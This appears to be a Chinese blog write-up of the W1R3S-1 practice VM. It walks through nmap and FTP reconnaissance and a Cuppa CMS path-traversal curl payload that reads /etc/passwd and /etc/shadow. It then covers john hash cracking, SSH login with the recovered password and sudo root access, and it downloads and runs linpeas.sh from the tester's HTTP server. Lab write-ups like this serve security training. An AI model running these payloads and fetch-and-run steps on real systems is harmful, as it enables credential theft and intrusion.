W1R3S-1
|
未分类
|
110

703 字
|
7 分钟
本文最后更新于 165 天前,其中的信息可能已经过时,如有错误请发送邮件到 1334258945@qq.com

nmap 信息枚举

还是先找到靶机 ip
用 ifconfig 看看自己的


发现是 192.168.161 段。
用 nmap 扫一下这个段

nmap 192.168.161.0/24 -sP


知道自己的靶机 ip 了
192.168.161.148

扫描靶机的端口信息

nmap -p- 192.168.161.148


PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
3306/tcp open mysql

靶机端口的详细信息

用 nmap 的详细命令

nmap -p- 192.168.161.148 -sS -sV -A -T5


发现这些信息

ftp弱口令:
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| drwxr-xr-x    2 ftp      ftp          4096 Jan 23  2018 content
| drwxr-xr-x    2 ftp      ftp          4096 Jan 23  2018 docs
|_drwxr-xr-x    2 ftp      ftp          4096 Jan 28  2018 new-employees
22端口开放:
OpenSSH 7.2p2 Ubuntu 4ubuntu2.4
其余信息无!

ftp 去看看。

进入 ftp 看一看

ftp 192.168.161.148

账号直接是 anonymous


登陆成功,看一看 content 里面的内容。


里面有 1 2 3 个 txt 文件,直接全下载

get 01.txt
get 02.txt
get 03.txt


docs 里面有 worktodo.txt 也下载

get worktodo.txt


这里面的也下载看看

get employee-names.txt


这是 01 的,没作用


这是 02 也没有作用


03 也没用

这个是 work 的那个也没用


这个也没用,也就是说 ftp 下载的东西都没用。

去 80 端口去查看


dirb 一下

dirb http://192.168.161.148/


查找出该页面存在 administrator 目录:

http://192.168.161.148/administrator/installation/


发现是 TitleCuppa CMS 框架!CuppaCMS 是一套内容管理系统 (CMS)!

谷歌搜索:Cuppa CMS exploit

https://www.exploit-db.com/exploits/25971


所以我们访问这个就行

http://192.168.161.148/administrator/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd


发现没有东西,上网查了一下我们这个是 get 传参,并没法显示内容,所以我们应该用 post 的传参。
用 kali 的 curl 就行

curl --data-urlencode urlConfig=../../../../../../../../../etc/passwd http://192.168.161.148/administrator/alerts/alertConfigField.php

–data-urlencode:
在新版本的 CURL 中,提供了新的选项 –data-urlencode,通过该选项提供的参数会自动转义特殊字符。


成功。这里并没有我们要找的,我们要找的应该在 shadow 里面

curl --data-urlencode urlConfig=../../../../../../../../../etc/shadow http://192.168.161.148/administrator/alerts/alertConfigField.php


看这个最长的,我们把他保存到一个 txt 里面。

john 爆破

我将那个放在了 01.txt 文件里面

john 01.txt


得到 ssh 的账号和密码
账号是 w1r3s
密码是 computer

ssh 登陆

ssh w1r3s@192.168.161.148

密码是 computer


成功登陆。


发现用 sudo -i 然后输入密码就能进入 root


我已经完成了这个挑战。

扩展

可以利用脚本直接把他靶机里面的信息全部拿到


利用这个文件就行。
在自己虚拟机开一个 http 的服务

python -m http.server 8081

在 ssh 里面

cd /tmp
wget http://192.168.161.142:8081/linpeas.sh
chmod +x linpeas.sh

然后运行

./linpeas.sh


就什么内容都有了,哈哈哈。
这个文件放到文章尾

通过百度网盘分享的文件:linpeas.sh
链接:https://pan.baidu.com/s/1JNkAWmMFKTcCNSI6K4CshQ?pwd=xlvu
提取码:xlvu
–来自百度网盘超级会员 V5 的分享

文末附加内容
暂无评论

发送评论 编辑评论 


				

			

						

				

					

						

							

								
							

							
						

					

				

				

					

						

							

								
							

							
						

					

				

				

					

						

							

								
							

							
							
													

					

				

			

			
			

				

					
				

			

				

											

							
							
						

																

							
							
						

																

							
							
						

										
					
											
						

	

		
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
	

	

		
颜文字
Emoji
小恐龙
花!
	


									

			

			
			
		

	






上一篇
下一篇 

                    

                    
			        推荐文章
		            

		            

							
世界,您好!